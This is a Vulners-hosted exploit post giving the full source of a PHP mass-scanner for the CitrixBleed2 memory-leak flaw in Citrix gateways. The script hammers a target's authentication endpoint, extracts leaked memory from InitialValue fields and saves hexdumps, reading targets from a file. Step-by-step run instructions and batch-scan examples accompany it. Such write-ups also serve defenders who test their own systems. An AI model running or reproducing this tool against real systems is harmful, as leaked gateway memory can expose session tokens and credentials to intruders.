Vulners
Lucene search
📄 Citrix Bleed 2 PHP Mass Scanner
=============================================================================================================================================
| # Title : Citrix Bleed 2 PHP Mass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.citrix.com/ |
=============================================================================================================================================
POC :
[+] A high-speed mass-scanner written in PHP designed to test for data
leakage through the CitrixBleed2 InitialValue extraction issue.
The tool reproduces the functionality of the original Bash/Parallel
scanner but works in restricted PHP environments.
[Features]
- Normalizes targets (host / URL)
- Extracts <InitialValue> leak
- Hexdumps results
- Saves output per-target
- Parallel-like batching (multi-curl)
- No banned functions required
[Usage]
php citrixbleed2.php --host https://gw.example.com --requests 1000
php citrixbleed2.php --file targets.txt --requests 5000 --out dumps
[Output]
- STDOUT live hexdumps
- dump/<host>.hexdump saved automatically
[Steps To Save & Execute]
1. Open a code editor (Notepad / VS Code / nano)
2. Copy the full PHP code below
3. Save the file as: citrixbleed2.php
4. Execute via terminal:
php citrixbleed2.php --host https://target.com
5. Ensure "dumps" folder is writable
====================================================================
PHP Scanner Code
====================================================================
<?php
/*
* CitrixBleed2 PHP Mass Scanner
* by Indoushka
*/
error_reporting(E_ALL);
ini_set("display_errors", 1);
$options = getopt("", [
"host::",
"file::",
"requests::",
"out::"
]);
$requests = $options["requests"] ?? 100;
$outDir = $options["out"] ?? "dumps";
$hostArg = $options["host"] ?? "";
$fileArg = $options["file"] ?? "";
if (!is_dir($outDir)) mkdir($outDir, 0777, true);
function normalize($url) {
$url = preg_replace("#^https?://#i", "", $url);
$url = explode("/", $url)[0];
return rtrim($url, "/");
}
function extract_iv($body) {
preg_match_all("#<InitialValue>(.*?)</InitialValue>#s", $body, $m);
$out = [];
foreach ($m[1] as $val) {
$clean = preg_replace('/[\r\n\t ]+/', '', $val);
if ($clean !== "" && preg_match('/[^\x20-\x7E]/', $clean))
$out[] = $clean;
}
return $out;
}
function hex_dump_str($data) {
$hex = unpack('H*', $data)[1];
$out = "";
$i = 0;
$len = strlen($hex);
while ($i < $len) {
$chunk = substr($hex, $i, 32);
$ascii = "";
for ($j = 0; $j < strlen($chunk); $j += 2) {
$c = hexdec(substr($chunk, $j, 2));
$ascii .= ($c >= 32 && $c <= 126) ? chr($c) : ".";
}
$out .= sprintf("%08x %s |%s|\n", $i/2,
trim(chunk_split($chunk, 2, " ")),
$ascii
);
$i += 32;
}
return $out;
}
function do_request($host) {
$url = "https://{$host}/p/u/doAuthentication.do";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => "login",
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
]);
$res = curl_exec($ch);
curl_close($ch);
return $res ?: "";
}
function run_host($rawHost, $count, $outDir) {
$h = normalize($rawHost);
$file = $outDir . "/" . $h . ".hexdump";
for ($i=1; $i <= $count; $i++) {
$body = do_request($h);
$ivs = extract_iv($body);
foreach ($ivs as $iv) {
$hex = hex_dump_str($iv);
echo $hex . "\n";
file_put_contents($file, $hex . "\n", FILE_APPEND);
}
}
}
if ($fileArg !== "") {
$targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) run_host($t, $requests, $outDir);
} else {
if ($hostArg === "") die("[!] Missing --host or --file\n");
run_host($hostArg, $requests, $outDir);
}
?>
====================================================================
Example Execution
====================================================================
Single host scan:
php citrixbleed2.php --host https://gateway.example.com --requests 5000
Batch scan:
php citrixbleed2.php --file targets.txt --requests 1000 --out dumps
Output directory:
dumps/<host>.hexdump
Live STDOUT hexdumps are shown in real-time.
====================================================================
Steps to Save and Execute
====================================================================
1. Open a text editor
2. Copy the entire PHP code
3. Save as: citrixbleed2.php
4. Create "dumps" folder if not exists
5. Open terminal / CMD
6. Execute:
php citrixbleed2.php --host https://target.com
php citrixbleed2.php --file targets.txt
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Nov 2025 00:00Current
7High risk
Vulners AI Score7